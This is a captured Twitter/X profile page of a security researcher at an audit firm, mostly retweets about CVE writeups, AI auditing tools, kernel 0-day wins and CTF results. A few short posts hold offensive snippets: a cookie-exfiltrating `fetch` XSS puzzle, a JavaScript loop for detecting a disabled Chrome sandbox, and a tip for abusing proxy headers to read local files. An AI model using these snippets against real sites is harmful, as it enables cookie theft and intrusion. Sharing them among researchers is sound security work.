William Bowling

217 posts

William Bowling

@wcbowling

Head of Assurance at @zellic_io, a.k.a. vakzz when doing bug bounties and CTFs with @pb_ctf - https://t.co/9bjECLAwXg

Tasmania, Australia · Joined July 2013
416 Following · 6.2K Followers
Pinned Tweet
William Bowling @wcbowling
Here’s a writeup of the recent ExifTool bug (CVE-2021-22204) I discovered while working on the #bugbounty program at @gitlab! Issue was in the DjVu module but can be embedded in most other formats. Make sure to patch GitLab and ExifTool! devcraft.io/2021/05/04/exi…
William Bowling retweeted
cts🌸 @gf_256
V12 is now live for open beta. It can:
- Find valuable bugs
- Generate working, runnable PoC
- Generate patch and test the PoC against it
In our testing during audits at Zellic, Zenith, and Code4rena we've been consistently impressed. Best of all: it's free. (Don't abuse it!)
pashov @pashov

@claudeai Impressive. Very nice. Now do this, but for smart contracts

William Bowling retweeted
Zellic @zellic_io
Last month, Zellic researcher @farazsth98 gave an internal talk on pwning the Linux kernel. He teased an exploit he'd be submitting to a 0day challenge. Today, @farazsth98 and his teammate just won $40,000 for a Linux kernel 0-day! Congratulations Faith!
Wiz @wiz_io

Team CCC (@u1f383 & @farazsth98): Team CCC dropped a Linux Kernel 0-day vulnerability that won them 3rd place (tied) and $40,000. Clean exploit, big win, and stronger Linux security.

William Bowling retweeted
Zellic @zellic_io
Bad auditors miss obvious bugs. We built an AI tool that finds them. Introducing V12: the only autonomous Solidity auditor that actually finds Highs and Criticals. We'll be releasing it for free. V12 finds Crits in Zellic audits, High/Mediums in Cantina, and a bug in Pendle.
William Bowling retweeted
Zellic @zellic_io
You’re probably using WebViews wrong. There are a million ways to use a WebView wrong. Properly securing a WebView is hard. In this thread, we’ll cover common vulnerabilities in wallet WebView implementations and the ways to properly secure WebViews.
William Bowling retweeted
Zellic @zellic_io
How to spot misleading audit competition metrics.
Competitions are crowdsourced audits, where auditors compete to find bugs in a set timeframe. Last year, we acquired @code4rena which does these. We've also seen tons of misleading sales pitches. Here's what to watch out for: 🧵
William Bowling retweeted
Zellic @zellic_io
With the rise of AI agents, we expect new bugs, but we’ve instead found old bugs in disguise. Let’s look at two old-school bugs we found while looking at elizaOS:
• An SSRF allowing internal services to be accessed
• An LFI allowing host files to be read
Let’s dive in 🧵
William Bowling retweeted
kamensec @kamensec
Just completed my 10th audit as a contractor @zellic_io and these are my top favourite things about this place:
1. They have a diverse and deep talent pool. World top Web security, Cosmos, Rust, Golang, MOVE. They have experts in every direction I want to move into (pun definitely unintended).
2. I still get to be independent, get my own clients, work with other teams. This keeps me fresh, accountable, and at the top of my game.
3. Every time I have asked for a specific type of contract, it magically shows up in my schedule. These past 4 months I've done countless bridges (EVM, OP, Cosmos), Client implementations in Rust, governance, staking, etc.
Keen to see what they throw at me next!
William Bowling retweeted
Zellic @zellic_io
What happens when Random() isn’t random? Here’s how popular projects, including Proton Wallet and the Dart SDK were all affected by the same underlying weakness we uncovered in the Dart/Flutter ecosystem. All issues found were responsibly disclosed with the vendors. Let’s go 🧵👇
William Bowling retweeted
Solidity @solidity_lang
✨ Our judges also decided to give a special mention to @wcbowling for his submission in which the bug allows a `multisig` storage variable to be overwritten, allowing the `emergencyWithdraw` function to be called by an attacker. Read @PatrickAlphaC’s thoughts on this submission! soliditylang.org/blog/2024/10/1…
William Bowling retweeted
Zellic @zellic_io
Version 0.11.0 of gnark was just released, which fixes two vulnerabilities in the Groth16 backend reported by Zellic (CVE-2024-45039, CVE-2024-45040). These affect the soundness and ZK property of generated proofs. Read on for more details and how to check if you're vulnerable.
William Bowling @wcbowling
@ajxchapman Disabling the sandbox also skips setting RLIMIT_DATA on Linux, might be able to detect this by creating buffers until it fails, e.g. on my box `b=[];try{for(i=0;i<64;i++){b.push(new ArrayBuffer(0x40000000))}}catch(e){}` gives 13 when sandboxed vs 15 without source.chromium.org/chromium/chrom…
Alex Chapman @ajxchapman
Is anyone aware of ways to detect whether the Chrome sandbox is enabled from an uncompromised renderer? I had assumed timing Mojo call responses would be enough to detect it, but my (basic) tests showed little reliable difference 🤔
William Bowling retweeted
Zellic @zellic_io
Zellic has moved forward to the final voting phase for @arbitrum's Security Council! We ask delegates to vote for Zellic as the Security Council furthers our mission to maximize TVL and extends our commitment to Arbitrum and its ecosystem. Vote here: tally.xyz/gov/arbitrum/c…
William Bowling retweeted
perfect blue @pb_ctf
2023 was another great year for the team! 🎉
Blue Water, a collab between perfect blue and @Water_Paddler, placed 1st in CTFtime globally!🏆
🥇 1st place in 6 CTFs
💻 Hosted a successful pbctf 2023
In the past, we also placed first in 2020 and 2021.✌ Looking forward to 2024!🎆
William Bowling retweeted
Zellic @zellic_io
The dangers of integer truncation: How the Zellic team found a critical vulnerability in the @AstarNetwork. This bug allowed an attacker to drain certain LP contracts on the Astar-EVM, with no bugs required in the contracts. Read more: 🧵👇
William Bowling retweeted
Zellic @zellic_io
Meet Cairo, the native language of Starknet. In this thread we'll:
✅ Introduce Cairo & Starknet
✅ Explore the security features of Cairo
✅ Examine potential pitfalls when writing contracts in Cairo
✅ Give you things to consider when writing secure code
Let's dig in👇🧵:
Gareth Heyes @garethheyes
Can you use a tagged template string without parentheses to call fetch and pass a cookie? E.g: fetch`/${document.cookie}` This doesn't work. Can you solve it? We've previously blogged about this. Best answer wins an Ebook copy of JavaScript for hackers. leanpub.com/javascriptforh…
William Bowling @wcbowling
@joaxcar Potentially use X-SendFile or X-Accel-Redirect for LFI if it goes through a proxy?
Johan Carlsson @joaxcar
If I can control response headers on a service, which ones can be abused? Like "Set-Cookie" to set cookies on the domain, "Location" for redirects, and CORS headers to loosen restrictions. What more? The victim is the visitor, I control the response on the target domain. (no XSS)
William Bowling retweeted
Zellic @zellic_io
Earlier this morning, @safemoon's Liquidity Pool was compromised and USD 8.9M worth of tokens were withdrawn. After looking at the transaction trace and the recent contract changes, we can tell you what happened:
William Bowling @wcbowling
@joaxcar Cheers! Finding a CSP bypass for that one was quite a challenge :D